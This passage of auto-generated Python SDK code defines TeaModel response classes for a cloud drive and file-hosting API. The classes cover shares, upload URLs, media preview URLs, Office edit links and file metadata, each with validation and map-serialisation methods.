if m.get('crc64_hash') is not None:
self.crc_64hash = m.get('crc64_hash')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('download_url') is not None:
self.download_url = m.get('download_url')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('encrypt_mode') is not None:
self.encrypt_mode = m.get('encrypt_mode')
if m.get('file_extension') is not None:
self.file_extension = m.get('file_extension')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('hidden') is not None:
self.hidden = m.get('hidden')
if m.get('image_media_metadata') is not None:
temp_model = ImageMediaResponse()
self.image_media_metadata = temp_model.from_map(m['image_media_metadata'])
if m.get('labels') is not None:
self.labels = m.get('labels')
if m.get('meta') is not None:
self.meta = m.get('meta')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('parent_file_id') is not None:
self.parent_file_id = m.get('parent_file_id')
if m.get('punish_flag') is not None:
self.punish_flag = m.get('punish_flag')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('size') is not None:
self.size = m.get('size')
if m.get('starred') is not None:
self.starred = m.get('starred')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('streams_info') is not None:
self.streams_info = m.get('streams_info')
if m.get('thumbnail') is not None:
self.thumbnail = m.get('thumbnail')
if m.get('trashed_at') is not None:
self.trashed_at = m.get('trashed_at')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
if m.get('url') is not None:
self.url = m.get('url')
if m.get('user_meta') is not None:
self.user_meta = m.get('user_meta')
if m.get('video_media_metadata') is not None:
temp_model = VideoMediaResponse()
self.video_media_metadata = temp_model.from_map(m['video_media_metadata'])
if m.get('video_preview_metadata') is not None:
temp_model = VideoPreviewResponse()
self.video_preview_metadata = temp_model.from_map(m['video_preview_metadata'])
return self
class GetLastCursorResponse(TeaModel):
"""
get last file op cursor response
"""
def __init__(
self,
cursor: str = None,
):
self.cursor = cursor
def validate(self):
pass
def to_map(self):
result = dict()
if self.cursor is not None:
result['cursor'] = self.cursor
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('cursor') is not None:
self.cursor = m.get('cursor')
return self
class GetLinkInfoByUserIDRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
user_id: str = None,
):
self.headers = headers
# user ID
self.user_id = user_id
def validate(self):
self.validate_required(self.user_id, 'user_id')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.user_id is not None:
result['user_id'] = self.user_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
return self
class GetMediaPlayURLResponse(TeaModel):
"""
get_media_play_url response
"""
def __init__(
self,
url: str = None,
):
# url
self.url = url
def validate(self):
pass
def to_map(self):
result = dict()
if self.url is not None:
result['url'] = self.url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('url') is not None:
self.url = m.get('url')
return self
class GetOfficeEditUrlResponse(TeaModel):
"""
获取office文档在线编辑地址 response
"""
def __init__(
self,
edit_url: str = None,
office_access_token: str = None,
office_refresh_token: str = None,
):
# EditUrl
self.edit_url = edit_url
# AccessToken
self.office_access_token = office_access_token
# RefreshToken
self.office_refresh_token = office_refresh_token
def validate(self):
pass
def to_map(self):
result = dict()
if self.edit_url is not None:
result['edit_url'] = self.edit_url
if self.office_access_token is not None:
result['office_access_token'] = self.office_access_token
if self.office_refresh_token is not None:
result['office_refresh_token'] = self.office_refresh_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('edit_url') is not None:
self.edit_url = m.get('edit_url')
if m.get('office_access_token') is not None:
self.office_access_token = m.get('office_access_token')
if m.get('office_refresh_token') is not None:
self.office_refresh_token = m.get('office_refresh_token')
return self
class GetOfficePreviewUrlResponse(TeaModel):
"""
获取文档预览地址 response
"""
def __init__(
self,
access_token: str = None,
preview_url: str = None,
):
# AccessToken
self.access_token = access_token
# preview_url
self.preview_url = preview_url
def validate(self):
pass
def to_map(self):
result = dict()
if self.access_token is not None:
result['access_token'] = self.access_token
if self.preview_url is not None:
result['preview_url'] = self.preview_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('access_token') is not None:
self.access_token = m.get('access_token')
if m.get('preview_url') is not None:
self.preview_url = m.get('preview_url')
return self
class GetPublicKeyRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
app_id: str = None,
):
self.headers = headers
# App ID
self.app_id = app_id
def validate(self):
pass
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.app_id is not None:
result['app_id'] = self.app_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
return self
class GetRPVerifyResultRequest(TeaModel):
"""
*\
"""
def __init__(
self,
user_id: str = None,
):
# User ID, 当前访问的用户
self.user_id = user_id
def validate(self):
self.validate_required(self.user_id, 'user_id')
def to_map(self):
result = dict()
if self.user_id is not None:
result['user_id'] = self.user_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
return self
class GetRPVerifyTokenRequest(TeaModel):
"""
*\
"""
def __init__(
self,
user_id: str = None,
):
# User ID, 当前访问的用户
self.user_id = user_id
def validate(self):
self.validate_required(self.user_id, 'user_id')
def to_map(self):
result = dict()
if self.user_id is not None:
result['user_id'] = self.user_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
return self
class GetShareLinkByAnonymousResponse(TeaModel):
"""
get_share_link_by_anonymous response
"""
def __init__(
self,
avatar: str = None,
creator_id: str = None,
creator_name: str = None,
creator_phone: str = None,
expiration: str = None,
share_name: str = None,
updated_at: str = None,
):
# avatar
self.avatar = avatar
# creator_id
self.creator_id = creator_id
# creator_name
self.creator_name = creator_name
# creator_phone
self.creator_phone = creator_phone
# expiration
self.expiration = expiration
# share_name
self.share_name = share_name
# updated_at
self.updated_at = updated_at
def validate(self):
pass
def to_map(self):
result = dict()
if self.avatar is not None:
result['avatar'] = self.avatar
if self.creator_id is not None:
result['creator_id'] = self.creator_id
if self.creator_name is not None:
result['creator_name'] = self.creator_name
if self.creator_phone is not None:
result['creator_phone'] = self.creator_phone
if self.expiration is not None:
result['expiration'] = self.expiration
if self.share_name is not None:
result['share_name'] = self.share_name
if self.updated_at is not None:
result['updated_at'] = self.updated_at
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('avatar') is not None:
self.avatar = m.get('avatar')
if m.get('creator_id') is not None:
self.creator_id = m.get('creator_id')
if m.get('creator_name') is not None:
self.creator_name = m.get('creator_name')
if m.get('creator_phone') is not None:
self.creator_phone = m.get('creator_phone')
if m.get('expiration') is not None:
self.expiration = m.get('expiration')
if m.get('share_name') is not None:
self.share_name = m.get('share_name')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
return self
class GetShareLinkIDResponse(TeaModel):
"""
get_share_id response
"""
def __init__(
self,
share_id: str = None,
share_pwd: str = None,
):
# share_id
self.share_id = share_id
# share_pwd
self.share_pwd = share_pwd
def validate(self):
pass
def to_map(self):
result = dict()
if self.share_id is not None:
result['share_id'] = self.share_id
if self.share_pwd is not None:
result['share_pwd'] = self.share_pwd
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('share_pwd') is not None:
self.share_pwd = m.get('share_pwd')
return self
class GetShareLinkTokenResponse(TeaModel):
"""
get_share_token response
"""
def __init__(
self,
expire_time: str = None,
expires_in: int = None,
share_token: str = None,
):
# expire_time
self.expire_time = expire_time
# expires_in
self.expires_in = expires_in
# share_token
self.share_token = share_token
def validate(self):
self.validate_required(self.expire_time, 'expire_time')
self.validate_required(self.expires_in, 'expires_in')
self.validate_required(self.share_token, 'share_token')
def to_map(self):
result = dict()
if self.expire_time is not None:
result['expire_time'] = self.expire_time
if self.expires_in is not None:
result['expires_in'] = self.expires_in
if self.share_token is not None:
result['share_token'] = self.share_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('expire_time') is not None:
self.expire_time = m.get('expire_time')
if m.get('expires_in') is not None:
self.expires_in = m.get('expires_in')
if m.get('share_token') is not None:
self.share_token = m.get('share_token')
return self
class GetShareResponse(TeaModel):
"""
Get share response
"""
def __init__(
self,
created_at: str = None,
creator: str = None,
description: str = None,
domain_id: str = None,
drive_id: str = None,
expiration: str = None,
expired: bool = None,
owner: str = None,
permissions: List[str] = None,
share_file_id: str = None,
share_file_path: str = None,
share_id: str = None,
share_name: str = None,
share_policy: List[SharePermissionPolicy] = None,
status: str = None,
updated_at: str = None,
):
# created_at
self.created_at = created_at
# creator
self.creator = creator
# description
self.description = description
# domain_id
self.domain_id = domain_id
# drive_id
self.drive_id = drive_id
# expiration
self.expiration = expiration
# expired
self.expired = expired
# owner
self.owner = owner
# permissions
self.permissions = permissions
# share_file_id
self.share_file_id = share_file_id
# share_path
self.share_file_path = share_file_path
# share_id
self.share_id = share_id
# share_name
self.share_name = share_name
self.share_policy = share_policy
# status
self.status = status
# updated_at
self.updated_at = updated_at
def validate(self):
if self.share_policy:
for k in self.share_policy:
if k:
k.validate()
def to_map(self):
result = dict()
if self.created_at is not None:
result['created_at'] = self.created_at
if self.creator is not None:
result['creator'] = self.creator
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.expiration is not None:
result['expiration'] = self.expiration
if self.expired is not None:
result['expired'] = self.expired
if self.owner is not None:
result['owner'] = self.owner
if self.permissions is not None:
result['permissions'] = self.permissions
if self.share_file_id is not None:
result['share_file_id'] = self.share_file_id
if self.share_file_path is not None:
result['share_file_path'] = self.share_file_path
if self.share_id is not None:
result['share_id'] = self.share_id
if self.share_name is not None:
result['share_name'] = self.share_name
result['share_policy'] = []
if self.share_policy is not None:
for k in self.share_policy:
result['share_policy'].append(k.to_map() if k else None)
if self.status is not None:
result['status'] = self.status
if self.updated_at is not None:
result['updated_at'] = self.updated_at
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('creator') is not None:
self.creator = m.get('creator')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('expiration') is not None:
self.expiration = m.get('expiration')
if m.get('expired') is not None:
self.expired = m.get('expired')
if m.get('owner') is not None:
self.owner = m.get('owner')
if m.get('permissions') is not None:
self.permissions = m.get('permissions')
if m.get('share_file_id') is not None:
self.share_file_id = m.get('share_file_id')
if m.get('share_file_path') is not None:
self.share_file_path = m.get('share_file_path')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('share_name') is not None:
self.share_name = m.get('share_name')
self.share_policy = []
if m.get('share_policy') is not None:
for k in m.get('share_policy'):
temp_model = SharePermissionPolicy()
self.share_policy.append(temp_model.from_map(k))
if m.get('status') is not None:
self.status = m.get('status')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
return self
class GetUploadUrlResponse(TeaModel):
"""
Get UploadUrl Response
"""
def __init__(
self,
create_at: str = None,
domain_id: str = None,
drive_id: str = None,
file_id: str = None,
part_info_list: List[UploadPartInfo] = None,
upload_id: str = None,
):
# created_at
self.create_at = create_at
# domain_id
self.domain_id = domain_id
# drive_id
self.drive_id = drive_id
# file_id
self.file_id = file_id
# part_info_list
self.part_info_list = part_info_list
# upload_id
self.upload_id = upload_id
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
if self.part_info_list:
for k in self.part_info_list:
if k:
k.validate()
def to_map(self):
result = dict()
if self.create_at is not None:
result['create_at'] = self.create_at
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_id is not None:
result['file_id'] = self.file_id
result['part_info_list'] = []
if self.part_info_list is not None:
for k in self.part_info_list:
result['part_info_list'].append(k.to_map() if k else None)
if self.upload_id is not None:
result['upload_id'] = self.upload_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('create_at') is not None:
self.create_at = m.get('create_at')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
self.part_info_list = []
if m.get('part_info_list') is not None:
for k in m.get('part_info_list'):
temp_model = UploadPartInfo()
self.part_info_list.append(temp_model.from_map(k))
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
return self
class GetVideoPreviewSpriteURLResponse(TeaModel):
"""
获取视频雪碧图地址 url response
"""
def __init__(
self,
col: int = None,
count: int = None,
frame_count: int = None,
frame_height: int = None,
frame_width: int = None,
row: int = None,
sprite_url_list: List[str] = None,
):
# col
self.col = col
# count
self.count = count
# frame_count
self.frame_count = frame_count
# frame_height
self.frame_height = frame_height
# frame_width
self.frame_width = frame_width
# row
self.row = row
# sprite_url_list
self.sprite_url_list = sprite_url_list
def validate(self):
pass
def to_map(self):
result = dict()
if self.col is not None:
result['col'] = self.col
if self.count is not None:
result['count'] = self.count
if self.frame_count is not None:
result['frame_count'] = self.frame_count
if self.frame_height is not None:
result['frame_height'] = self.frame_height
if self.frame_width is not None:
result['frame_width'] = self.frame_width
if self.row is not None:
result['row'] = self.row
if self.sprite_url_list is not None:
result['sprite_url_list'] = self.sprite_url_list
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('col') is not None:
self.col = m.get('col')
if m.get('count') is not None:
self.count = m.get('count')
if m.get('frame_count') is not None:
self.frame_count = m.get('frame_count')
if m.get('frame_height') is not None:
self.frame_height = m.get('frame_height')
if m.get('frame_width') is not None:
self.frame_width = m.get('frame_width')
if m.get('row') is not None:
self.row = m.get('row')
if m.get('sprite_url_list') is not None:
self.sprite_url_list = m.get('sprite_url_list')
return self
class GetVideoPreviewURLResponse(TeaModel):
"""
获取视频文件播放 url response
"""
def __init__(
self,
preview_url: str = None,
):
# preview_url
self.preview_url = preview_url
def validate(self):
pass
def to_map(self):
result = dict()
if self.preview_url is not None:
result['preview_url'] = self.preview_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('preview_url') is not None:
self.preview_url = m.get('preview_url')
return self
class HostingCompleteFileResponse(TeaModel):
"""
complete file response
"""
def __init__(
self,
content_hash: str = None,
content_hash_name: str = None,
content_type: str = None,
crc: str = None,
crc_64hash: str = None,
created_at: str = None,
description: str = None,
domain_id: str = None,
download_url: str = None,
drive_id: str = None,
file_extension: str = None,
file_path: str = None,
name: str = None,
parent_file_path: str = None,
share_id: str = None,
size: int = None,
status: str = None,
thumbnail: str = None,
trashed_at: str = None,
type: str = None,
updated_at: str = None,
upload_id: str = None,
url: str = None,
):
# Content Hash
self.content_hash = content_hash
# content_hash_name
self.content_hash_name = content_hash_name
# content_type
self.content_type = content_type
# crc
self.crc = crc
# crc64_hash
self.crc_64hash = crc_64hash
# created_at
self.created_at = created_at
# description
self.description = description
# domain_id
self.domain_id = domain_id
# download_url
self.download_url = download_url
# drive_id
self.drive_id = drive_id
# file_extension
self.file_extension = file_extension
# file_path
self.file_path = file_path
# name
self.name = name
# parent_file_id
self.parent_file_path = parent_file_path
# share_id
self.share_id = share_id
# Size
self.size = size
# status
self.status = status
# thumbnail
self.thumbnail = thumbnail
# trashed_at
self.trashed_at = trashed_at
# type
self.type = type
# updated_at
self.updated_at = updated_at
# upload_id
self.upload_id = upload_id
# url
self.url = url
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.name, 'name')
if self.name is not None:
self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
if self.parent_file_path is not None:
self.validate_max_length(self.parent_file_path, 'parent_file_path', 50)
self.validate_pattern(self.parent_file_path, 'parent_file_path', '[a-z0-9]{1,50}')
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9]+')
if self.size is not None:
self.validate_maximum(self.size, 'size', 53687091200)
self.validate_minimum(self.size, 'size', 0)
def to_map(self):
result = dict()
if self.content_hash is not None:
result['content_hash'] = self.content_hash
if self.content_hash_name is not None:
result['content_hash_name'] = self.content_hash_name
if self.content_type is not None:
result['content_type'] = self.content_type
if self.crc is not None:
result['crc'] = self.crc
if self.crc_64hash is not None:
result['crc64_hash'] = self.crc_64hash
if self.created_at is not None:
result['created_at'] = self.created_at
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.download_url is not None:
result['download_url'] = self.download_url
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_extension is not None:
result['file_extension'] = self.file_extension
if self.file_path is not None:
result['file_path'] = self.file_path
if self.name is not None:
result['name'] = self.name
if self.parent_file_path is not None:
result['parent_file_path'] = self.parent_file_path
if self.share_id is not None:
result['share_id'] = self.share_id
if self.size is not None:
result['size'] = self.size
if self.status is not None:
result['status'] = self.status
if self.thumbnail is not None:
result['thumbnail'] = self.thumbnail
if self.trashed_at is not None:
result['trashed_at'] = self.trashed_at
if self.type is not None:
result['type'] = self.type
if self.updated_at is not None:
result['updated_at'] = self.updated_at
if self.upload_id is not None:
result['upload_id'] = self.upload_id
if self.url is not None:
result['url'] = self.url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('content_hash') is not None:
self.content_hash = m.get('content_hash')
if m.get('content_hash_name') is not None:
self.content_hash_name = m.get('content_hash_name')
if m.get('content_type') is not None:
self.content_type = m.get('content_type')
if m.get('crc') is not None:
self.crc = m.get('crc')
if m.get('crc64_hash') is not None:
self.crc_64hash = m.get('crc64_hash')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('download_url') is not None:
self.download_url = m.get('download_url')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_extension') is not None:
self.file_extension = m.get('file_extension')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('parent_file_path') is not None:
self.parent_file_path = m.get('parent_file_path')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('size') is not None:
self.size = m.get('size')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('thumbnail') is not None:
self.thumbnail = m.get('thumbnail')
if m.get('trashed_at') is not None:
self.trashed_at = m.get('trashed_at')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
if m.get('url') is not None:
self.url = m.get('url')
return self
class HostingCopyFileResponse(TeaModel):
"""
文件拷贝 response
"""
def __init__(
self,
async_task_id: str = None,
domain_id: str = None,
drive_id: str = None,
file_path: str = None,
share_id: str = None,
):
# async_task_id
self.async_task_id = async_task_id
# domain_id
self.domain_id = domain_id
# drive_id
self.drive_id = drive_id
# file_path
self.file_path = file_path
# drive_id
self.share_id = share_id
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z-]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[a-z0-9A-Z]+')
def to_map(self):
result = dict()
if self.async_task_id is not None:
result['async_task_id'] = self.async_task_id
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_path is not None:
result['file_path'] = self.file_path
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('async_task_id') is not None:
self.async_task_id = m.get('async_task_id')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class HostingCreateFileResponse(TeaModel):
"""
Create file response
"""
def __init__(
self,
domain_id: str = None,
drive_id: str = None,
file_path: str = None,
part_info_list: List[UploadPartInfo] = None,
share_id: str = None,
type: str = None,
upload_id: str = None,
):
# domain_id
self.domain_id = domain_id
# drive_id
self.drive_id = drive_id
# file_path
self.file_path = file_path
# part_info_list
self.part_info_list = part_info_list
# share_id
self.share_id = share_id
# type
self.type = type
# upload_id
self.upload_id = upload_id
def validate(self):
if self.domain_id is not None:
self.validate_max_length(self.domain_id, 'domain_id', 50)
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9]{1,50}')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.part_info_list:
for k in self.part_info_list:
if k:
k.validate()
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9]+')
def to_map(self):
result = dict()
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_path is not None:
result['file_path'] = self.file_path
result['part_info_list'] = []
if self.part_info_list is not None:
for k in self.part_info_list:
result['part_info_list'].append(k.to_map() if k else None)
if self.share_id is not None:
result['share_id'] = self.share_id
if self.type is not None:
result['type'] = self.type
if self.upload_id is not None:
result['upload_id'] = self.upload_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
self.part_info_list = []
if m.get('part_info_list') is not None:
for k in m.get('part_info_list'):
temp_model = UploadPartInfo()
self.part_info_list.append(temp_model.from_map(k))
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
return self
class HostingDeleteFileResponse(TeaModel):
"""
删除文件 response
"""
def __init__(
self,
async_task_id: str = None,
domain_id: str = None,
drive_id: str = None,
file_path: str = None,
share_id: str = None,
):
# async_task_id
self.async_task_id = async_task_id
# domain_id
self.domain_id = domain_id
# drive_id
self.drive_id = drive_id
# file_path
self.file_path = file_path
# share_id
self.share_id = share_id
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[a-z0-9A-Z]+')
def to_map(self):
result = dict()
if self.async_task_id is not None:
result['async_task_id'] = self.async_task_id
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_path is not None:
result['file_path'] = self.file_path
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('async_task_id') is not None:
self.async_task_id = m.get('async_task_id')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class HostingDeleteFilesResponse(TeaModel):
"""
批量删除文件 response
"""
def __init__(
self,
deleted_file_id_list: List[str] = None,
domain_id: str = None,
drive_id: str = None,
share_id: str = None,
):
# deleted_file_id_list
self.deleted_file_id_list = deleted_file_id_list
# domain_id
self.domain_id = domain_id
# drive_id
self.drive_id = drive_id
# share_id
self.share_id = share_id
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9]+')
def to_map(self):
result = dict()
if self.deleted_file_id_list is not None:
result['deleted_file_id_list'] = self.deleted_file_id_list
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deleted_file_id_list') is not None:
self.deleted_file_id_list = m.get('deleted_file_id_list')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class HostingGetDownloadUrlResponse(TeaModel):
"""
获取download url response
"""
def __init__(
self,
expiration: str = None,
method: str = None,
url: str = None,
):
# expiration
self.expiration = expiration
# method
self.method = method
# url
self.url = url
def validate(self):
pass
def to_map(self):
result = dict()
if self.expiration is not None:
result['expiration'] = self.expiration
if self.method is not None:
result['method'] = self.method
if self.url is not None:
result['url'] = self.url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('expiration') is not None:
self.expiration = m.get('expiration')
if m.get('method') is not None:
self.method = m.get('method')
if m.get('url') is not None:
self.url = m.get('url')
return self
class HostingGetFileResponse(TeaModel):
"""
获取文件元数据response
"""
def __init__(
self,
content_hash: str = None,
content_hash_name: str = None,
content_type: str = None,
crc_64hash: str = None,
created_at: str = None,
description: str = None,
domain_id: str = None,
download_url: str = None,
drive_id: str = None,
file_extension: str = None,
file_path: str = None,
name: str = None,
parent_file_path: str = None,
share_id: str = None,
size: int = None,
status: str = None,
thumbnail: str = None,
trashed_at: str = None,
type: str = None,
updated_at: str = None,
upload_id: str = None,
url: str = None,
):
# Content Hash
self.content_hash = content_hash
# content_hash_name
self.content_hash_name = content_hash_name
# content_type
self.content_type = content_type
# crc64_hash
self.crc_64hash = crc_64hash
# created_at
self.created_at = created_at
# description
self.description = description
# domain_id
self.domain_id = domain_id
# download_url
self.download_url = download_url
# drive_id
self.drive_id = drive_id
# file_extension
self.file_extension = file_extension
# file_path
self.file_path = file_path
# name
self.name = name
# parent_file_id
self.parent_file_path = parent_file_path
# share_id
self.share_id = share_id
# Size
self.size = size
# status
self.status = status
# thumbnail
self.thumbnail = thumbnail
# trashed_at
self.trashed_at = trashed_at
# type
self.type = type
# updated_at
self.updated_at = updated_at
# upload_id
self.upload_id = upload_id
# url
self.url = url
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.name, 'name')
if self.name is not None:
self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
if self.parent_file_path is not None:
self.validate_max_length(self.parent_file_path, 'parent_file_path', 50)
self.validate_pattern(self.parent_file_path, 'parent_file_path', '[a-z0-9]{1,50}')
if self.share_id is not None:
self.validate_pattern(self.share_id, 'share_id', '[0-9]+')
if self.size is not None:
self.validate_maximum(self.size, 'size', 53687091200)
self.validate_minimum(self.size, 'size', 0)
def to_map(self):
result = dict()
if self.content_hash is not None:
result['content_hash'] = self.content_hash
if self.content_hash_name is not None:
result['content_hash_name'] = self.content_hash_name
if self.content_type is not None:
result['content_type'] = self.content_type
if self.crc_64hash is not None:
result['crc64_hash'] = self.crc_64hash
if self.created_at is not None:
result['created_at'] = self.created_at
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.download_url is not None:
result['download_url'] = self.download_url
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_extension is not None:
result['file_extension'] = self.file_extension
if self.file_path is not None:
result['file_path'] = self.file_path
if self.name is not None:
result['name'] = self.name
if self.parent_file_path is not None:
result['parent_file_path'] = self.parent_file_path
if self.share_id is not None:
result['share_id'] = self.share_id
if self.size is not None:
result['size'] = self.size
if self.status is not None:
result['status'] = self.status
if self.thumbnail is not None:
result['thumbnail'] = self.thumbnail
if self.trashed_at is not None:
result['trashed_at'] = self.trashed_at
if self.type is not None:
result['type'] = self.type
if self.updated_at is not None:
result['updated_at'] = self.updated_at
if self.upload_id is not None:
result['upload_id'] = self.upload_id
if self.url is not None:
result['url'] = self.url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('content_hash') is not None:
self.content_hash = m.get('content_hash')
if m.get('content_hash_name') is not None:
self.content_hash_name = m.get('content_hash_name')
if m.get('content_type') is not None:
self.content_type = m.get('content_type')
if m.get('crc64_hash') is not None:
self.crc_64hash = m.get('crc64_hash')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('download_url') is not None:
self.download_url = m.get('download_url')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_extension') is not None:
self.file_extension = m.get('file_extension')
if m.get('file_path') is not None:
self.file_path = m.get('file_path')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('parent_file_path') is not None:
